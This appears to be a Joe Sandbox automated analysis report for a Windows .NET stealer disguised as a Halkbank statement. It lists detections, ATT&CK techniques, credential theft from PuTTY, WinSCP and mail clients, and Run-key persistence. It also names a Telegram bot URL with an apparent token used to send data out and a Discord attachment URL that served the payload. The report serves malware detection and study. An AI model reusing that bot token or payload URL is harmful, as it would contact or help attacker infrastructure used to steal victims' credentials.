                    Source: Yara matchFile source: 15.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.Ffnbziuo.exe.33ac7a8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.Ffnbziuo.exe.33ac7a8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.Ffnbziuo.exe.335c788.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.399275119.000000000415D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.545103234.000000000331D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.527576945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000000.386534863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.548623792.0000000008269000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000000.386867081.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.398967629.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000000.386199386.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.545199356.00000000033AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000000.385913370.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.544867705.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.399607436.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Halkbank_Ekstre_20220513_082357_541079.exe PID: 6424, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1028, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Ffnbziuo.exe PID: 4600, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts211
                    Windows Management Instrumentation
                    1
                    Registry Run Keys / Startup Folder
                    211
                    Process Injection
                    1
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    Exfiltration Over Other Network Medium1
                    Web Service
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    Registry Run Keys / Startup Folder
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Credentials in Registry
                    114
                    System Information Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    Exfiltration Over Bluetooth1
                    Ingress Tool Transfer
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
                    Obfuscated Files or Information
                    Security Account Manager21
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    Automated Exfiltration11
                    Encrypted Channel
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                    Software Packing
                    NTDS1
                    Process Discovery
                    Distributed Component Object ModelInput CaptureScheduled Transfer3
                    Non-Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Timestomp
                    LSA Secrets131
                    Virtualization/Sandbox Evasion
                    SSHKeyloggingData Transfer Size Limits4
                    Application Layer Protocol
                    Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Masquerading
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items131
                    Virtualization/Sandbox Evasion
                    DCSync1
                    Remote System Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job211
                    Process Injection
                    Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 626599 Sample: Halkbank_Ekstre_20220513_08... Startdate: 14/05/2022 Architecture: WINDOWS Score: 100 47 api.telegram.org 2->47 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 Multi AV Scanner detection for submitted file 2->67 69 8 other signatures 2->69 8 Halkbank_Ekstre_20220513_082357_541079.exe 16 7 2->8         started        13 Ffnbziuo.exe 14 3 2->13         started        15 Ffnbziuo.exe 3 2->15         started        signatures3 process4 dnsIp5 49 cdn.discordapp.com 162.159.135.233, 443, 49749 CLOUDFLARENETUS United States 8->49 51 192.168.2.1 unknown unknown 8->51 39 C:\Users\user\AppData\...\Ffnbziuo.exe, PE32 8->39 dropped 41 C:\Users\...\Ffnbziuo.exe:Zone.Identifier, ASCII 8->41 dropped 43 Halkbank_Ekstre_20...2357_541079.exe.log, ASCII 8->43 dropped 71 Writes to foreign memory regions 8->71 73 Injects a PE file into a foreign processes 8->73 17 InstallUtil.exe 14 6 8->17         started        21 cmd.exe 1 8->21         started        53 162.159.133.233, 443, 49779, 49781 CLOUDFLARENETUS United States 13->53 75 Multi AV Scanner detection for dropped file 13->75 77 Machine Learning detection for dropped file 13->77 23 cmd.exe 13->23         started        25 cmd.exe 15->25         started        file6 signatures7 process8 dnsIp9 45 api.telegram.org 149.154.167.220, 443, 49774, 49776 TELEGRAMRU United Kingdom 17->45 55 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->55 57 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 17->57 59 Tries to steal Mail credentials (via file / registry access) 17->59 61 3 other signatures 17->61 27 conhost.exe 21->27         started        29 timeout.exe 1 21->29         started        31 conhost.exe 23->31         started        33 timeout.exe 23->33         started        35 conhost.exe 25->35         started        37 timeout.exe 25->37         started        signatures10 process11

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Halkbank_Ekstre_20220513_082357_541079.exe35%VirustotalBrowse
                    Halkbank_Ekstre_20220513_082357_541079.exe39%ReversingLabsByteCode-MSIL.Downloader.Seraph
                    Halkbank_Ekstre_20220513_082357_541079.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe39%ReversingLabsByteCode-MSIL.Downloader.Seraph
                    SourceDetectionScannerLabelLinkDownload
                    15.0.InstallUtil.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                    15.0.InstallUtil.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                    15.0.InstallUtil.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                    15.0.InstallUtil.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                    15.2.InstallUtil.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    15.0.InstallUtil.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://qguwMz.com0%Avira URL Cloudsafe
                    https://api.telegram.orgD8dkh0%Avira URL Cloudsafe
                    https://api.telegram.org4dk0%Avira URL Cloudsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                    http://www.microsoft.0%URL Reputationsafe
                    https://api.ipify.org%%startupfolder%0%URL Reputationsafe
                    http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                    https://rBRWiNLNwm.com0%Avira URL Cloudsafe
                    https://api.ipify.org%0%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    cdn.discordapp.com
                    162.159.135.233
                    truefalse
                      high
                      api.telegram.org
                      149.154.167.220
                      truefalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocumentfalse
                          high
                          https://cdn.discordapp.com/attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmpfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://127.0.0.1:HTTP/1.1InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://qguwMz.comInstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://stackoverflow.com/q/14436606/23354Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://api.telegram.orgInstallUtil.exe, 0000000F.00000002.532125758.0000000003533000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://github.com/mgravell/protobuf-netJHalkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.orgD8dkhInstallUtil.exe, 0000000F.00000002.532614975.0000000003581000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://cdn.discordapp.com/attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp/XcfHalkbank_Ekstre_20220513_082357_541079.exe, Ffnbziuo.exe.0.drfalse
                                    high
                                    https://api.telegram.org4dkInstallUtil.exe, 0000000F.00000002.532125758.0000000003533000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwInstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://github.com/mgravell/protobuf-netHalkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.microsoft.Ffnbziuo.exe, 00000011.00000002.529534251.00000000022CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://api.ipify.org%%startupfolder%InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      low
                                      https://cdn.discordapp.comHalkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.389756600.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.529463502.00000000022A1000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.530056532.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://github.com/mgravell/protobuf-netiHalkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://stackoverflow.com/q/11564914/23354;Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://stackoverflow.com/q/2152978/23354Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmpfalse
                                              high
                                              http://DynDns.comDynDNSnamejidpasswordPsi/PsiInstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.399275119.000000000415D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.398967629.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.399607436.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.527576945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000000.385913370.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.545103234.000000000331D000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.548623792.0000000008269000.00000004.00000001.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.545199356.00000000033AC000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.544867705.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://rBRWiNLNwm.comInstallUtil.exe, 0000000F.00000002.532077311.000000000352B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.531824600.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.532228765.0000000003548000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://api.telegram.orgInstallUtil.exe, 0000000F.00000002.532228765.0000000003548000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.532614975.0000000003581000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHalkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.389756600.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.532125758.0000000003533000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.529463502.00000000022A1000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.530056532.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://api.ipify.org%InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    low
                                                    https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocumentdocument-----InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      149.154.167.220
                                                      api.telegram.orgUnited Kingdom
                                                      62041TELEGRAMRUfalse
                                                      162.159.135.233
                                                      cdn.discordapp.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      162.159.133.233
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      IP
                                                      192.168.2.1
                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                      Analysis ID:626599
                                                      Start date and time: 14/05/202215:14:282022-05-14 15:14:28 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 12m 52s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:Halkbank_Ekstre_20220513_082357_541079.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:32
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@20/4@7/4
                                                      EGA Information:
                                                      • Successful, ratio: 50%
                                                      HDC Information:
                                                      • Successful, ratio: 0.1% (good quality ratio 0.1%)
                                                      • Quality average: 95%
                                                      • Quality standard deviation: 7.1%
                                                      HCA Information:
                                                      • Successful, ratio: 97%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                      • TCP Packets have been reduced to 100
                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                      • Execution Graph export aborted for target Ffnbziuo.exe, PID 4568 because it is empty
                                                      • Execution Graph export aborted for target Ffnbziuo.exe, PID 4600 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                      TimeTypeDescription
                                                      15:16:37AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ffnbziuo "C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe"
                                                      15:16:38API Interceptor1x Sleep call for process: Halkbank_Ekstre_20220513_082357_541079.exe modified
                                                      15:16:39API Interceptor355x Sleep call for process: InstallUtil.exe modified
                                                      15:16:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ffnbziuo "C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe"
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      Process:C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):1306
                                                      Entropy (8bit):5.34813255600093
                                                      Encrypted:false
                                                      SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7QJE4oE4KAE4Kx1qE4FsXD:MxHKXwYHKhQnoPtHoxHhAHKzvQJHoHKD
                                                      MD5:1C9995275B68444467DA6D0FD76F3D56
                                                      SHA1:D680875F7AF0B883A4EC12B1293CBEFDEB438692
                                                      SHA-256:A806A18044D16C9085E25A1A158F0608D38B45332812BCE76F43516882B981B0
                                                      SHA-512:2A1BBC92D520C6B8C1B53150F27990E4AC09F11937470AB7D38995D36CE983FF68DEA6400F7AFC4E268BBFA7A20CF945B726B95C539ED889DE55968536F38ACC
                                                      Malicious:true
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data.SqlXml, Version=4.0.0.0, Culture=neutral, Public
                                                      Process:C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):24576
                                                      Entropy (8bit):3.6016712532356197
                                                      Encrypted:false
                                                      SSDEEP:192:6F7qKYJTOIFfqdgaa62h/sDSl7H6jQpHR9oGR6H1iS2W/5owhtFhseg0l:6F7qp4sG062VsDSZH6U0GAH1zFRXr
                                                      MD5:BEF71F070519AAD800BF09D7D5A7659B
                                                      SHA1:2D276DA3AEFC56F4FA91CFAAF7E766F48F1D6140
                                                      SHA-256:969BF771ED84B11BC61CFF977691A938687D043CA13B851EFA7A627EF58B90B0
                                                      SHA-512:F2BEC83B6424A09CF2D2143B37674FDEA0302D9D9509257AE3948024D36D391BA1E85C6D507E105FFA907721AFDC40468FAD47B8C30BCC6F3EEF0D3411FC99FE
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe, Author: Florian Roth
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 39%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0......F......z7... ...@....@.. ....................................@.................................(7..O....@..,B...........................7............................................... ............... ..H............text........ ...................... ..`.rsrc...,B...@...D..................@..@.reloc...............^..............@..B................\7......H.......t$..............T6..............................................6.s....(.....*".(.....*..0..6........s.......i.+.......o.......%.Y......-..o....(...+.+..*...0............ ....(........&....s.......o.....s...... .....*....+.......o...........io....%.........-..o.......!.,..o ......,..o ......,..o .......*....4................).<e........#.Mp..........`{.......0.............r...p(....(.....+..*".(.....*.0..4.........(.....s....(....(!.....o"...o#........,...+...+..*.0..
                                                      Process:C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                      Category:dropped
                                                      Size (bytes):20480
